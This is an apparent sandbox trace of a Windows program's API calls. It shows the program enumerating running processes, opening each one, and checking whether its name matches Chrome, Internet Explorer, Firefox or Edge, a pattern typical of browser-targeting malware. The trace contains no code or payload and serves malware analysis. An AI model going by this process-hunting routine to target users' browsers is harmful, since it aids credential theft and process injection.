	[0241.933] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x8794
	[0241.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.933] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0241.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.934] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.934] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0241.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.934] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.935] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.935] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x8798
	[0241.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.935] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.936] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.936] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.936] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.937] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0241.937] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x879c
	[0241.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.938] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.938] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.938] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.938] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.939] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0241.939] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x87a0
	[0241.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.940] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0241.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.940] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.940] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0241.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.941] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.941] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.942] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x87a4
	[0241.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.943] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.943] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.944] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.944] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.944] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0241.945] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x87a8
	[0241.946] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.946] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0241.946] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.946] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.947] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0241.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.947] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.948] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0241.949] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x87ac
	[0241.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.949] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0241.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.949] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.950] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0241.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.950] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.950] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0241.951] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x87b0
	[0241.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.952] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0241.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.952] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.952] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0241.953] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.953] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.953] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0241.954] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x87b4
	[0241.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.954] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0241.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.954] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.954] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0241.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.955] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.955] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0241.956] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0241.956] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0241.957] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x87b8
	[0241.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.957] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0241.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.957] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.958] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.958] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0241.958] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.959] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.959] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0241.960] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x87bc
	[0241.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.960] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0241.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.960] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.960] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0241.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.961] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.961] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0241.962] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x87c0
	[0241.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.962] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0241.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.962] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.963] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0241.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.963] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.963] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0241.964] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x87c4
	[0241.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.964] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0241.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.964] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.965] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0241.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.965] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.965] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0241.966] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x87c8
	[0241.966] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.966] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0241.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.967] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.967] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0241.968] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.968] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.968] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0241.969] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x87cc
	[0241.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.969] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0241.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.969] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.970] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0241.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.970] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.970] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0241.971] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x87d0
	[0241.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.971] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0241.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.971] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.972] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0241.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.973] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.973] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0241.974] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x87d4
	[0241.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.974] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0241.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.974] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.975] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0241.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.975] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.976] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0241.976] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x87d8
	[0241.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.977] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0241.977] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.977] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.977] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.977] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0241.977] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.977] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.977] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0241.978] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x87dc
	[0241.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.978] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0241.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.979] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.979] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0241.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.979] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.979] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0241.980] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x87e0
	[0241.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.980] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0241.981] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.981] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.981] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.981] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0241.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.982] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.982] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0241.983] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x87e4
	[0241.983] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.983] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0241.983] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.983] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.984] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.984] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0241.985] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.985] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.985] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0241.986] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x87e8
	[0241.986] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.986] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0241.986] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.986] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.987] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.987] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0241.987] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.987] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.988] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0241.988] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x87ec
	[0241.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.989] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0241.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.989] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.990] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.990] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0241.990] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.991] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.991] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0241.992] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x87f0
	[0241.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.992] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0241.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.992] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.993] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.993] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0241.993] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.993] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.994] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0241.994] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x87f4
	[0241.995] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.995] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
